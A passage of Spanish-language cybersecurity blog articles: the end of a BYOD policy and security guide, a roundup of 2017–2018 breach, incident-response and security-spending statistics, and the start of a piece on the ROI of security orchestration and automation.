lugar de comprar en el departamento de compras de una organización. Esto ayuda a mantener líneas claras de propiedad y garantiza que los participantes tengan una relación directa con el proveedor de hardware. Es posible que se desee poner a disposición descuentos para empleados. Es posible que algunos trabajadores necesiten o deseen complementar su dispositivo con equipos periféricos, como monitores o teclados, en la oficina. En este escenario, debemos asegurarnos de especificar quién comprará y poseerá cada artículo. ### Servicio disponible BYOD no tiene que ser una proposición de todo o nada. Debería pensarse en los servicios específicos que se desea que estén disponibles en dispositivos BYO y si esto diferirá para grupos de trabajo específicos, tipos de usuarios, tipos de dispositivos y redes utilizadas. Además, los trabajadores de BYOD a menudo traen soluciones de nivel de usuario a la empresa, esperando que funcionen en conjunto con las aplicaciones y los servicios empresariales. Estos pueden incluir versiones ligeras de aplicaciones empresariales, aplicaciones móviles y servicios SaaS centrados en el usuario/consumidor. El departamento de TI debería decidir si permite que soluciones como estas se usen para el trabajo, y si es fuese así, si se pueden instalar directamente en el punto final en el mismo entorno que los datos relacionados con el trabajo. Para las personas que desean instalar aplicaciones directamente en su pcs para su uso personal, las organizaciones pueden considerar ofrecer descuentos para empleados de Office Professional para Mac y PC a través de Microsoft Software Assurance por ejemplo. De esta forma, el cumplimiento de la licencia es responsabilidad exclusiva de la persona y la empresa no incurre en ningún riesgo ni responsabilidad por infracciones. ### Rollout Una vez que la iniciativa BYOD ha sido diseñada, la comunicación es vital para una implementación exitosa. Las personas deberían recibir orientación para ayudarles a decidir si participar o no y cómo elegir el dispositivo adecuado para sus necesidades. También deben comprender las responsabilidades que conlleva traer su propio dispositivo, incluyendo cómo se puede acceder, usar y almacenar los datos. Los datos de trabajo y negocios deben mantenerse estrictamente segregados en un dispositivo BYOD para soportar los requisitos de e-discovery y las políticas de retención de datos, de manera similar, los correos electrónicos de trabajo nunca se deben enviar desde cuentas personales. Las políticas de uso aceptable deben aplicarse de la misma manera en los dispositivos BYO que en los dispositivos corporativos. ### Compratir costes Uno de los principales beneficios de BYOD es la capacidad de reducir costes haciendo que las personas y departamentos paguen parte o la totalidad del coste de varios dispositivos utilizados para el trabajo, sacando así a TI del negocio de adquirir y soportar una gama cada vez mayor de hardware en toda la empresa. Las eficiencias de costes de la virtualización de escritorios hacen posible diseñar políticas de reemplazo de laptops que generan ahorros significativos para mientras que también ayudan a sufragar el costo de los dispositivos para las personas o departamentos participantes. El 40 por ciento de las compañías que planean introducir este tipo de programa tienen la intención de pagar una ayuda aproximadamente igual al monto que le costaría al departamento TI adquirir y administrar un dispositivo similar. Otro 31 por ciento planea ofrecer algún nivel de contribución para el coste total incurrido por el empleado. Los participantes deben saber que la ayuda será tratado a efectos fiscales como ingreso. Cualquier política de Bring your own device, con o sin costes compartido, debe dejar tambien claro, quién pagará por el acceso a la red fuera del firewall corporativo, ya sea a través de 3G, Wi-Fi pública o banda ancha doméstica. Las ayudas deben renovarse a intervalos regulares, como el ciclo típico de renovación de hardware de tres años, para garantizar que los dispositivos personales no superen la edad esperada para un dispositivo empresarial. Si un participante del programa abandona la empresa durante un ciclo de BYOD, es posible que la empresa desee reclamar una parte de la ayuda actual, siendo así responsables de pagar una porción prorrateada de dicha ayuda. El coste compartido tiene implicaciones para la introducción de BYOD en la organización. Una implementación completa puede aumentar el costo a medida que las personas se registran y reclaman sus ayudas en todos los puntos del ciclo de actualización del endpoint. Ofrecer el programa a las personas a medida que llegan al final del ciclo de vida sus dispositivo extenderá el impacto, generalmente durante tres años. Las organizaciones que no ofrecen una ayuda pueden alentar la participación total desde el primer día a dicho programa. ## Seguridad y Cumplimiento Más de tres cuartas partes de los CIO temen que un mayor consumo de TI genere un gran aumento en los riesgos empresariales. Esta es una preocupación razonable, y una de las cuestiones planteadas con mayor frecuencia. Si bien la instalación de aplicaciones directamente en dispositivos no corporativos puede aumentar el riesgo, un programa BYOD basado en la virtualización de escritorio lo hace innecesario. Toda la información comercial permanece segura dentro del centro de datos, residiendo en el punto final solo en forma aislada y encriptada, y solo cuando es absolutamente necesario. En los casos donde los datos necesitan residir en el punto final, se pueden proteger a través de mecanismos de aislamiento, encriptación y borrado remoto. Para evitar la filtración, y el departamento de TI puede implementar políticas para desactivar la impresión o el acceso al almacenamiento del lado del cliente, como unidades locales y almacenamiento USB. Los participantes en el programa también deben asegurarse de que el software antivirus / antimalware se instale y actualice en su endpoint. Para proteger la red empresarial, algunas organizaciones aplican la tecnología de control de acceso a la red (NAC) para autenticar a las personas que se conectan a la red y verificar si sus dispositivos cuentan con software antivirus actualizado y parches de seguridad. El inicio de sesión único y las contraseñas seguras permiten la conveniencia y la seguridad. Fuera del firewall, la virtualización y el cifrado pueden aliviar la mayoría de las vulnerabilidades de seguridad de Wi-Fi, cifrado WEP, open Wifi, 3G / 4G y otros métodos de acceso de nivel de consumidor. En el caso de que un participante de BYOD abandone la organización, se viole la política BYOD ,se pierda o se robe un dispositivo BYO, TI debería tener un mecanismo para terminar el acceso de manera instantánea a datos y aplicaciones. En lugar de permitir un Bring your own device abierto, en el que las personas pueden llevar cualquier dispositivo para acceder a aplicaciones y datos empresariales, algunas organizaciones eligen un enfoque administrado. En este escenario, TI administra el dispositivo BYO directamente, incluido el registro, la validación, la autorización y el acceso a los recursos del dispositivo. La seguridad, la protección de datos y la gobernanza de TI , en un entorno virtualizado se aplica a los dispositivos BYO con la misma eficacia que a los dispositivos corporativos. - Todos los datos empresariales están alojados y respaldados en el centro de datos - La información comercial confidencial se entrega a los endpoint solo en forma aislada y encriptada para evitar pérdidas o manipulación. - Cuando casos de uso requieren datos para residir en dispositivos BYO, el departamento TI mantiene la capacidad de borrar los datos de forma remota si es necesario. - La centralización de datos y la computación a pedido en cualquier dispositivo facilitan la continuidad del negocio y la recuperación ante desastres. - La gestión de registros, gestión de la información y las políticas de retención de datos para documentos y correo electrónico se aplican y administran de forma centralizada. - La supervisión exhaustiva, el registro de actividad y la generación de informes garantizan la privacidad de los datos y el cumplimiento de las normativas. ### Soporte y mantenimiento del dispositivo BYOD Un programa BYOD a menudo reduce el mantenimiento total requerido para cada dispositivo porque el usuario también es el propietario. Una política de BYOD debe explicar explícitamente cómo se abordarán y pagarán varias tareas de soporte y mantenimiento. Cuando un dispositivo BYO ha reemplazado un endpoint corporativo, puede haber una mayor expectativa de soporte, pero esto debe definirse estrictamente para evitar exponer al departamento TI una mayor complejidad y carga de trabajo. De acuerdo con la simplicidad BYOD, la compañía debe adoptar un enfoque de no intervención, brindando soporte solo para conectividad inalámbrica, software antivirus / antimalware. ## Una estrategia tecnológica segura para BYOD Las soluciones BYOD deben ofrecer virtualización de escritorio, una tienda de aplicaciones empresarial unificada y uso compartido de archivos para hacer que BYOD sea simple y seguro para cualquier organización. ### Cualquier dispositivo, personal o comercial Las personas y los departamentos obtienen la libertad de elegir sus propios dispositivos, incluidos equipos de escritorio y portátiles Windows y Mac o Linux, productos móviles basados en iOS, Android y Windows, Google Chromebooks, etc. El roaming continuo y una experiencia de alta definición en dispositivos, ubicaciones y redes garantizan la conveniencia y la productividad óptima. ### Virtualización de escritorio y aplicaciones El departamento TI puede transformar cualquier aplicación corporativa -incluidas las aplicaciones de Windows, web y SaaS, así como también escritorios completos en un servicio a petición de cualquier necesidad, buscando usar cualquier combinación de enfoques de entrega de aplicaciones y escritorios para admitir todo tipo de trabajador a través de un solo punto de control. ### Tienda de aplicaciones de autoservicio Las personas deberian poder acceder fácilmente a cualquiera de sus aplicaciones autorizadas en cualquier dispositivo a través de una tienda de aplicaciones segura y consistente con una buena experiencia de inicio de sesión. ### Follow me Las personas pueden compartir archivos de forma segura con cualquier persona dentro o fuera de su organización y sincronizar archivos en todos sus dispositivos. El departamento de TI puede implementar políticas de uso integrales y borrar de forma remota los datos de los dispositivos para que la información comercial confidencial esté segura, incluso si un dispositivo se pierde o es robado. El control de acceso, la auditoría y la generación de informes ayudan a controlar el acceso a archivos no autorizado o inapropiado. ### Security by default Debido a que las aplicaciones y los datos se administran dentro del centro de datos, TI mantiene la protección de datos centralizada, el cumplimineto de control de accesos y la administración de usuarios tan fácilmente en dispositivos BYO como en endpoints corporativos, dentro del mismo entorno unificado. ## Conclusión Como una estrategia en el nexo de poderosas tendencias TI como el workshifting, la movilidad y la computación en la nube, BYOD continuará transformando la forma en que las personas y las organizaciones trabajan. La estrategia correcta, habilitada a través de la entrega de datos, aplicaciones y escritorios bajo demanda a cualquier dispositivo, hará que: - Las personas elijan sus propios dispositivos para mejorar la productividad, la colaboración y la movilidad - Proteja la información confidencial de pérdidas y robos mientras se abordan los mandatos de privacidad, cumplimiento y gestión de riesgos - Se reduzcan los costes y simplifique la administración mediante el aprovisionamiento de autoservicio y la administración y supervisión automatizadas - Se simplifique la infraestructura TI permitiendo que las aplicaciones se construyan una vez y se ejecuten en cualquier dispositivo --- # El estado de la ciberseguridad en números URL: https://ciberseguridad.blog/el-estado-de-la-ciberseguridad-en-numeros/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-04-20 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > Los datos nos revelan el estado de una situación concreta, y en este caso, nos indican la evolución de la ciberseguridad respecto a otros años. ¡CONÓCELOS! Mantenerse al tanto de las tendencias más importantes en ciberseguridad puede ser un desafío, no por falta de datos, sino por la gran cantidad de información que podemos encontrar. Los analistas, proveedores, equipos de investigación y otros producen cantidades muy importantes de datos sobre infracciones, tendencias de malware, amenazas emergentes, hábitos y tendencias sobre presupuestos de seguridad, esfuerzos y multitud de otros temas relacionados. Los datos pueden alertarnos sobre las cosas que deberíamos estar cuidando o al meno sobre las que deberíamos mostrar cierto interes, cómo se comparan nuestros controles y procesos, donde estan centrando los atacantes sus esfuerzos, si nuestra inversión es suficiente o cómo se comparan con nuestros esfuerzos de cumplimiento con los indicados. Pero, ¿cómo separamos los datos que importan de los datos que solo aumentan el ruido? Para ayudar a enfocarte en lo que importa, os traemos numerosos informes de investigación, análisis de proveedores y documentos técnicos, concentrando la información que agrega nuevos conocimientos o actualizaciones. ## Las Violaciones de datos en números [Vídeo](https://www.youtube.com/watch?v=0BfPfXQ2S80) 1,579: Número total de infracciones de datos reveladas públicamente en 2017 Más organizaciones revelaron violaciones de datos el año pasado que nunca. En 1,579, el número de incumplimientos en 2017 fue 44.7% más alto que los 1,091 divulgados en 2016. Las organizaciones empresariales, como las de los sectores minorista, hotelero, comercial y de servicios públicos, representaron el 55% de las infracciones, seguidas por las consultas médicas y industria de la salud, con un 23.7% Fuente: Revisión de fin de año de incumplimiento de los datos anuales de 2017 1,946,181,599: Cantidad total de registros que contienen datos personales y otros datos confidenciales que se han visto comprometidos entre el 1 de enero de 2017 y el 20 de marzo de 2018 Tan asombrosamente grande como podría parecer ese número, en realidad es más pequeño que los más de 4.800 millones de registros expuestos en violaciones de datos en 2016. Dos incumplimientos que Yahoo reveló en 2017 representaron aproximadamente 1.500 millones de los registros expuestos el año pasado, mientras que uno divulgado por Myspace representó otros 360 millones de registros. Fuente: Cronología de las violaciones de datos 75%: Porcentaje de violaciones de datos causadas por atacantes externos Contrariamente a algunas percepciones, los actores externos continúan representando una amenaza mucho mayor para las organizaciones que los internos. Entre los actores externos, los grupos organizados de ciberdelincuentes representaron más de la mitad (51%) de las infracciones, mientras que el 18% de los ataques involucraron a grupos afiliados al estado. Las personas descuidadas, negligentes y maliciosas con acceso legítimo a los sistemas y a los datos causaron el 25% de las infracciones. Fuente: Informe de Investigaciones de Brecha de Datos 2017 de Verizon 71%: Porcentaje de empresas estadounidenses de un total de 1.200 empresas que informaron haber sufrido al menos una violación de datos Más de 7 de cada 10 organizaciones en los EEUU se vieron afectadas de alguna manera por una filtración de datos en los últimos años. Alrededor del 46% de las organizaciones estadounidenses experimentaron un incidente de incumplimiento en el último año, un aumento sustancial del 24% reportado en 2017 y el 20% que dijo que habían sufrido una infracción en 2016. En todo el mundo, las cifras son ligeramente inferiores, con El 67% de los encuestados informaron al menos de una infracción. Fuente: Informe Global de Amenazas 2018 del grupo Thales 3.62 millones de dolares: Costo promedio de una violación de datos en 2017 Si bien las brechas se hicieron más grandes, el coste promedio de una violación de datos disminuyó un 10% en 2017, a 3,62 millones. El coste promedio asociado con los registros perdidos y robados que contienen información confidencial también disminuyó sustancialmente, a 141 dólares resecto a los 158 por registro de 2016. Al mismo tiempo, el número de registros comprometidos por infracción aumentó a 24,000. Fuente: Estudio de incumplimiento del costo de los datos de 2017 del Instituto Ponemon ## Detección y respuesta a incidentes ***77%: Porcentaje de encuestados de un total de 2.800 profesionales de TI que dijeron que sus organizaciones no tienen un plan formal de respuesta a incidentes de ciberseguridad A pesar de la gran preocupación por las violaciones de datos, más de tres cuartas partes de las organizaciones no tienen un proceso formal para respuesta ante las mismas. El veintiséis por ciento solo tiene un proceso ad-hoc o informal, y el 27% no aplica su plan de respuesta ante incidentes de formalmente en toda la empresa. Fuente: Tercer estudio anual sobre la organización ciberresistente de Ponemon Institute para IBM Resilient 91 días: El tiempo promedio que las organizaciones tardan en identificar una violación de datos Una brecha de más de seis meses entre cuando ocurre una violación y cuando se identifica por primera, algo que puede parecer terrible. Pero 191 días es en realidad una mejora en el promedio de los 201 días que las organizaciones tardaron en detectar una infracción en 2016. Fuente: Estudio de incumplimiento del costes de los datos de 2017 del instituto Ponemon por IBM Security 66 días: El tiempo promedio necesario para contener por completo una violación de datos en 2017 El número de días que demoraron las organizaciones para contener una violación en 2017 varió de 10 a 164 días, con un promedio de 66 días. Las violaciones causadas por ataques maliciosos y delictivos generalmente demoraron más (77 días) o más para identificar (214 días) que las infracciones causadas por errores humanos (64 y 168 días, respectivamente). Fuente: Estudio de incumplimiento del costo de los datos de 2017 del Ponemon Institute para IBM Security ## Ciberseguridad para altos mandos [Vídeo](https://www.youtube.com/watch?v=b0qHRYeGLyY) 45%: Porcentaje de encuestados de un total de 9.500 ejecutivos de 122 países que dijeron que su junta corporativa participa activamente en el establecimiento de presupuestos de seguridad Sobre la necesidad de que la seguridad se convierta en un problema a nivel de junta, muchas juntas todavía parecen no estar involucradas en la estrategia de seguridad de la organización. Solo el 39% participa activamente en el establecimiento de políticas de seguridad, el 36% participa en el proceso de selección de tecnología, y menos de un tercio (31%) revisa activamente los riesgos actuales de seguridad y la privacidad. Fuente: Encuesta Global de Seguridad de la Información 2018 (PwC) 87%: Porcentaje de empresas que dicen necesitar hasta un 50% más de presupuesto para ciberseguridad Las organizaciones están gastando más que nunca en seguridad. Sin embargo, 7 de cada 10 directivos dicen que necesitan al menos un 25% más de gasto, y un 17% desean hasta un 50% de aumento del presupuesto. Sin embargo, solo el 12% cree que en realidad recibirá un aumento en el presupuesto de seguridad de más del 25%. El resto claramente tendrá que arreglárselas con cualquier aumento que obtengan. Fuente: EY Global Information Security Survey 2017-18 76%: Porcentaje de organizaciones que probablemente aumentarían los recursos disponibles para ciberseguridad despues de una brecha que causara daños significativos Más de tres cuartas partes de las organizaciones dijeron que una brecha de datos significativa sería un catalizador para aumentar la imversión en ciberseguridad. Pero es poco probable que muchas de esas mismas organizaciones aumenten la inversión en caso de una violación que no cause daños. Sesenta y cuatro por ciento de las organizaciones dicen que un ataque que no causase daño no desencadenaría aumentos de presupuesto. Fuente: EY Global Information Security Survey 2017-18 29%: Porcentaje de encuestados de un total de 9.500 ejecutivos de 75 industrias en 122 países que dijeron que los CISOs tienen la responsabilidad de la seguridad de la IoT Las organizaciones a menudo implementan dispositivos IoT sin pensar en las implicaciones de seguridad. Solo el 34% de los encuestados, por ejemplo, incluso planea evaluar los riesgos potenciales para la seguridad empresarial al conectar más dispositivos a Internet. Sin embargo, casi 3 de cada 10 creen que la organización de seguridad debería ser responsable de garantizar el entorno IoT. Fuente: Encuesta Global de Seguridad de la Información 2018 de PwC ## Tendencias en ciberataques 77%: Porcentaje de ataques a endpoints en 2017 que debido a el uso de malware y exploits sin archivos El malware que se ejecuta en la memoria es mucho más difícil de detectar y detener que el malware instalado en los sistemas, por lo que los agentes de amenazas han comenzado a utilizar malware sin archivos en sus ataques. El 54% de los encuestados de un total de 665 profesionales TI dijeron que sus organizaciones sufrieron uno o más ataques que comprometieron sus datos y/o la infraestructura. De esos ataques, el 77% involucró malware y exploits sin archivos. Fuente: Informe de riesgo de seguridad del 2017 de Ponemon Institute para Barkly 56%: Porcentaje de organizaciones en una encuesta de un total de 1.300 responsables de TI que identificaron ataques de phishing como su mayor amenaza sobre la ciberseguridad actual De todas las amenazas a las que se enfrentan las organizaciones en la actualidad, los ataques de phishing siguen siendo los más grandes para muchos, y el 56% lo identifican como su principal preocupación. Otras amenazas que mantienen a los gerentes de seguridad despiertos por la noche son las amenazas internas (51%), el ransomware/malware (48%) y las cuentas privilegiadas no aseguradas (42%). El 42% de los encuestados identificó las amenazas a los datos en la nube como otro gran problema. Fuente: [Informe global de amenazas avanzadas del año 2018 por CyberArk(https://www.cyberark.com/resource/cyberark-global-advanced-threat-landscape-report-2018/) 26,2%: Porcentaje de los destinatarios del ransomware en 2017 que eran usuarios comerciales Los proveedores de ransomware el año pasado volcaron su enfoque a las empresas. Los ataques de WannaCry en mayo pasado, el brote de NotPetya en junio y los ataques de BadRabbit de octubre fueron los mayores ataques de ransomware dirigidos a las empresas, pero también hubo otros. Eso convirtió a 2017 en el año del ransomware para las empresas. Fuente: Informe de Kaspersky Lab 87%: Porcentaje de ataques de ejecución remota de código a fines del año pasado que involucraron malware criptográfico El "secuestro" de computadoras con fines de minería de cifrado se está convirtiendo rápidamente en un problema importante para las empresas de la misma manera que el ransomware se convirtió en una gran amenaza hace un par de años. Casi el 90% de todos los ataques de ejecución remota de código en diciembre pasado implicó intentos de descargar subrepticiamente de cripto-mineros. Fuente: Informe de Imperva ## Presupuestos y gastos en ciberseguridad 86%: porcentaje de organizaciones estadounidenses que planean aumentar el gasto en ciberseguridad este año Casi 9 de cada 10 empresas planean aumentar el gasto en ciberseguridad este año, un 10% mas que el 76% que dijo lo mismo en 2017. Las cifras mundiales son ligeramente más pequeñas, con el 78% informando sobre planes para aumentar la inversión en ciberseguridad en comparación con el 73% del año pasado. Fuente: Informe Global de Amenazas 2018 del Grupo 451 para Thales 96.3 mil millones: El total de organizaciones en todo el mundo que planea gastar en ciberseguridad en 2018 Las preocupaciones sobre la violación de datos y los temores de amenazas como el WannaCry o el NotPetya llevarán a los gastos en ciberseguridad a otro nivel este año. Los 96,3 mil millones que las organizaciones gastarán en productos y servicios de seguridad este año representan un aumento del 8% con respecto a 2017 y un aumento de más del 17% sobre los 82,2 mil millones que las organizaciones en todo el mundo gastaron en 2016. Fuente: Nota de Gartner 75.200 millones: Cantidad que las organizaciones de todo el mundo gastarán en servicios de protección y seguridad de infraestructura en 2018 Gartner espera que la externalización de TI, las pruebas de seguridad y la información de seguridad y gestión de eventos sean los segmentos de más rápido crecimiento dentro de las categorías de protección y servicios de infraestructura este año. El segmento de administración de identidades y acceso tendrá un gasto de 4.7 mil millones este año, y el segmento de seguridad de red representará 11.7 mil millones en gastos generales. Fuente: Nota de Gartner ## Cumplimiento y gobierno El vídeo que acompañaba a este apartado ya no está disponible en YouTube. 74%: Porcentaje de encuestados de EEUU en una encuesta de un total de 1.200 organizaciones que sienten que los requisitos de cumplimiento es "muy" efectivo o "extremadamente" efectivo A pesar del debate sobre cumplimiento versus seguridad, casi tres cuartas partes de las organizaciones en los EEUU creen que cumplir con los mandatos regulatorios e industriales, como PCI DSS, es una excelente forma de mejorar la seguridad. Por el contrario, un 64% más pequeño de las organizaciones en todo el mundo tienen una visión similarmente positiva sobre el cumplimiento. Fuente: Informe Global de Amenazas 2018 del Grupo 451 para Thales 88%: Porcentaje de un total de 300 CIOs, CPOs, consejeros generales y otros altos cargos de las empresas estadounidenses, británicas y japonesas que informaron haber gastado más de 1 millón en cumplimiento de la GDPR Las organizaciones que se apresuran a cumplir con el plazo para cumplir con los requisitos generales de protección de datos de la UE están gastando más en aumentar sus programas de privacidad y seguridad. De las compañías que han completado sus preparativos, el 88% dijo que gastó al menos 1 millón, y el 10% dijo que gastaron en torno a 10 millones. Entre las empresas que aún no terminaron sus proyectos, el 60% espera gastar al menos 1 millón en el cumplimiento de la GDPR, y el 12% gastará más de 10 millones. Fuente: Informe GDPR de PwC 15 mil millones: Presupuesto propuesto para la ciberseguridad federal sobre el presupuesto del año fiscal 2019 La cantidad en el propuesto es un aumento de 583.4 millones con respecto a la estimación del año fiscal 2011 para la ciberseguridad federal. Como de costumbre, más de la mitad del coste corresponde al Departamento de Defensa de los EEUU, que el año pasado recibió 8,500 millones en fondos para la ciberseguridad. Fuente: Fondos para la ciberseguridad de EEUU 971 millones: Cantidad solicitada por el Departamento de Seguridad Nacional de los EEUU para las operaciones de ciberseguridad en 2018 De esta cantidad, el DHS ha asignado 437 millones a la dirección de ciencia y tecnología para investigación y desarrollo y 279 millones en esfuerzos continuos de diagnóstico y mitigación de ciberseguridad. Fuente: Informe de Statista 52%: Porcentaje de encuestados de un total de 200 responsables de TI de departamentos civiles y de Defensa que ven las regulaciones y los mandatos de seguridad cibernética como un obstáculo para la gestión de riesgos Más de la mitad de los responsables de la toma de decisiones de TI en las agencias federales consideran que los mandatos como el Marco de gestión de riesgos del NIST complican los esfuerzos de ciberseguridad, en lugar de ayudar. El 55% dijo que el Cybersecurity Framework del NIST ha ayudado al menos a promover un diálogo de gestión de riesgos en las organizaciones. Fuente: Encuesta Federal de Ciberseguridad de SolarWinds 54%: Porcentaje de tomadores de decisiones de TI en agencias federales que consideran que los empleados y contratistas descuidados y desentrenados presentan el mayor riesgo de seguridad Contrariamente a la percepción, los empleados descuidados y negligentes a menudo representan una amenaza mayor para la ciberseguridad que los maliciosos. Las preocupaciones sobre el tema parecen estar creciendo, considerando que solo el 48% citó a personas descuidadas como un riesgo de seguridad en 2016 en comparación con el 54% que dijo lo mismo en 2017. Fuente: Encuesta Federal de Ciberseguridad de SolarWinds ## Ciberseguridad en sistemas móviles, IoT y de control industrial [Vídeo](https://www.youtube.com/watch?v=2mJsl_AM1QY) 100%: El porcentaje de organizaciones de una muestra de 850 organizaciones con al menos 500 dispositivos móviles que experimentaron un ataque móvil en 2017 Todas las organizaciones que permiten el uso de dispositivos móviles para el trabajo experimentaron alguna forma de ataque, pero no siempre lo sabían. De hecho, las organizaciones fueron atacadas 54 veces en promedio. No todos los ataques resultaron en infracciones. Fuente: [Los ciberataques móviles afectan a todas las empresas, informe de Check Point]http://pages.checkpoint.com/mobile-impact-report.html?utm_source=blog&utm_medium=cp website&utm_campaign=CM_BLG_17Q4_US_Mobile Impact Rpt Blog) 54%: Porcentaje de encuestados en una encuesta de un total de 359 profesionales de ciberseguridad que informaron al menos de un incidente de seguridad que involucró un sistema de control industrial en los últimos 12 meses Las preocupaciones sobre las fallas de seguridad catastróficas en las organizaciones con sistemas críticos de control industrial parecen estar superando el número de incidentes reales. Aun así, más de la mitad han experimentado incidentes de seguridad que involucran malware o actores terceros. Fuente: El estado de la ciberseguridad industrial 2017 de Business Advantage para Kaspersky 55%: porcentaje de organizaciones industriales que permiten a terceros, como proveedores, socios y proveedores de servicios, acceder a su red de control industrial A pesar de la creciente preocupación por los riesgos de terceros, más de la mitad de las organizaciones industriales permitieron a personas ajenas, acceder a los sistemas críticos de forma remota. Como era de esperar, las organizaciones que permiten el acceso de terceros también tienen un 63% más de probabilidades de experimentar una infracción de ciberseguridad frente a aquellas que no permiten dicho acceso. Fuente: El estado de la ciberseguridad industrial 2017 de Business Advantage para Kaspersky 40%: Porcentaje de líderes empresariales en una encuesta a 9.500 profesionales de TI que están preocupados por un ciberataque en las redes de IoT y otras tecnologías emergentes que causan interrupciones operativas A pesar de los beneficios potenciales de la automatización y los sistemas robotizados, muchos líderes organizacionales se preocupan por la vulnerabilidad de las tecnologías emergentes y sus amenazas cibernéticas. Además de las interrupciones operativas, el robo de datos es una preocupación para el 39% y el 32% teme que la calidad del producto se vea afectada por un ciberataque exitoso en las tecnologías emergentes como el IoT. Fuente: Encuesta Global de Seguridad de la Información 2018 de PwC 61%: Porcentaje de organizaciones que han implementado algún nivel de tecnologías IoT y que tuvieron que lidiar con un incidente de seguridad relacionado con IoT en el último año La mayoría de los incidentes de seguridad que involucran redes IoT se deben a ataques reales, como infiltración de malware (24%) y ataques de phishing/ingeniería social (18%). Más de 1 de cada 10 (11%) incidentes de seguridad de IoT involucraron problemas de configuración incorrecta del dispositivo, 9% involucraron escalado de privilegios y 6% resultaron en un robo de credenciales. Fuente: Preparación para la ciberseguridad de Internet of Things, investigación de Osterman para Trustwave --- # El ROI de la automatización en seguridad URL: https://ciberseguridad.blog/el-roi-de-la-automatizacion-en-seguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-04-14 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > Conoce cuánto tiempo y dinero nos puede ahorrar la automatización en seguridad, un ROI fácil de justificar que evoluciona las operaciones del SOC. La velocidad nunca ha sido tan importante para los equipos de operaciones de seguridad que hoy. A medida que la tecnología que utilizamos en el trabajo se expande de ordenadores de escritorio y portátiles a Internet, o a medida que los dispositivos corporativos dan paso a una cultura de BYOD, cada vez es más difícil descubrir y contener amenazas a la seguridad. Las tecnologías cambian, las amenazas evolucionan, y por ello, también las operaciones de seguridad. En la actualidad, las operaciones de seguridad a menudo se ralentizan mediante procesos manuales que sería mejor dejar de hacer. Además, si bien existen muchas herramientas de seguridad en el mercado, no todas se integran con otras herramientas o sistemas de una forma sencilla, ni comparten información en forma de datos o alertas relevantes. La brecha de talento de seguridad de hoy en día también agrava estos problemas, ya que los equipos son escasos y hay dificultades para optimizar los recursos existentes. La fatiga de alertas es muy común y, en el caos, los incidentes, los compromisos y las infracciones se desvanecen casi de una forma inadvertida. [Vídeo](https://www.youtube.com/watch?v=rom5suR91xU) Soy muy FAN de Splunk que ha adquirido Phantom recientemente ## Orquestación y automatización de la seguridad Aunque no es todo caos y oscuridad. La orquestación de la seguridad y la automatización se están convirtiendo en un aspecto cada vez más vital de las estrategias de seguridad de muchas organizaciones, y están ayudando a poner peso en la balanza del lado de los defensores. Muchas empresas utilizan la orquestación y la automatización para abordar con éxito estos procesos de seguridad y tipos de investigación comunes: - Phishing - Escalado de Privilegios - Contención del Malware - Compromiso de Credenciales - Gestión de Vulnerabilidades ## Beneficios de la automatización de seguridad La organización y automatización de la seguridad ofrece a los equipos de seguridad: - Tiempos de respuesta a incidentes más rápidos - Grandes ahorros de tiempo y costos - Mayor precisión en todas las operaciones de seguridad De hecho, los equipos reducen su tiempo promedio a una respuesta ante incidentes de 30 minutos a 5 minutos, lo que equivale a alrededor del 83% del tiempo ahorrado por alerta. Además, los equipos mejoran drásticamente su precisión y hacen más con los recursos que tienen. Con máquinas que recopilan y almacenan el contexto relevante sobre un evento de seguridad, los equipos pueden cambiar su enfoque al análisis y su respuesta en lugar de gastar cantidades exorbitantes de tiempo recopilando datos de forma manual. La orquestación y automatización de seguridad agrega flexibilidad en el proceso de detección y respuesta, lo que permite a los equipos automatizar lo menos posible. ## Cuándo introducir la orquestación y la automatización en ciberseguridad El momento ideal para que las organizaciones comiencen a implementar la automatización y la orquestación de seguridad es una vez que hayan invertido en las personas, los procesos y la tecnología que impulsan las operaciones. Algunos ejemplos incluyen tener: un IDS, una herramienta de administración de casos, firewalls, herramientas de inteligencia y analisis forense de amenaza, procesos de respuesta a incidentes y unos pocos empleados a tiempo completo dedicados a la seguridad. La orquestación y la automatización optimiza todas estas inversiones uniéndolas de forma racionalizada y coherente. Si el planteamiento es empezar con la orquestación y la automatización de seguridad en la organización, la primera pregunta (o la de tu jefe) debería ser: "¿Cuál es el ROI de automatizar y orquestar la seguridad?". Una pregunta inteligente, que intentaremos ver a lo largo del Post, y cuyo fin, espero que sea, abrirnos los ojos a la automatización en casos en los que incluso actualmente se indica que es necesario el "factor humano", demostrando un alto ROI y un gran beneficio para la empresa. ## Demostrando el retorno de la inversión en seguridad La orquestación y la automatización de la seguridad pueden hacer que los equipos sean más rápidos y más eficientes. Pero, ¿cómo podemos medir exactamente cómo de rápidos y eficientes son? ¿Cómo puede el personal de seguridad encargado de realizar las compras de herramientas, crear los procesos y gestionar las personas demostrar un claro ROI en la orquestación y automatización de la seguridad? Es una pregunta difícil de responder, por lo que intentaremos evaluar el rendimiento de la inversi en seguridad, la orquestación y automatización, tratando: - Operaciones manuales de seguridad - Desarrollo interno de la orquestación y automatización de seguridad. - Orquestación y automatización de seguridad lista para arrancar. Las métricas que rodean a los tres principales impulsores de la seguridad (personas, procesos y herramientas) pueden verse directamente afectadas por la orquestación y la automatización de ciberseguridad, lo que ayuda a ilustrar el valor que esto puede aportar a todo el equipo. Con esta información, podremos asegurar la aceptación de los mandos o simplemente probar el valor de lo que ya estamos haciendo. ## El coste de las operaciones manuales en seguridad Para visualizar el ROI de la orquestación y automatización de la seguridad, debemos ver cuánto cuesta la manera manual de hacer las cosas. Si nuestras operaciones de seguridad son manuales hoy, dividiremos en 3 factores involucrados: - Personas - Procesos - Tecnología ### Personal de ciberseguridad Una de las partes más costosas y complejas de la inversión en seguridad es el personal. Y eso es, en parte, debido a la escasez de talento en seguridad. De hecho, el 23% de los profesionales de seguridad dicen que la escasez de talentos es el mayor desafío al que se enfrenta toda la industria de la tecnología de la información. Hay una tasa de desempleo cercana al 0% para las personas formadas en seguridad. Es algo bueno para los profesionales de la seguridad, pero no para RRHH. El 21% de trabajos de seguridad de alto nivel (aquellos que requieren más de 10 años de experiencia) llevan más de un año para cubrir el puesto. Por lo tanto, suponiendo que pudiésemos encontrar suficientes expertos en seguridad para llenar las solicitudes abiertas, tendremos que remunera los mismo de una mejor forma. Cuando hablamos de capital humano, de lo que realmente estamos hablando es del tiempo invertido. ¿Cuánto tiempo pasan sus valiosos miembros del equipo de seguridad en tareas rutinarias que podrían automatizarse? Para el propósitos de calcular el ROI, intentando hacer las 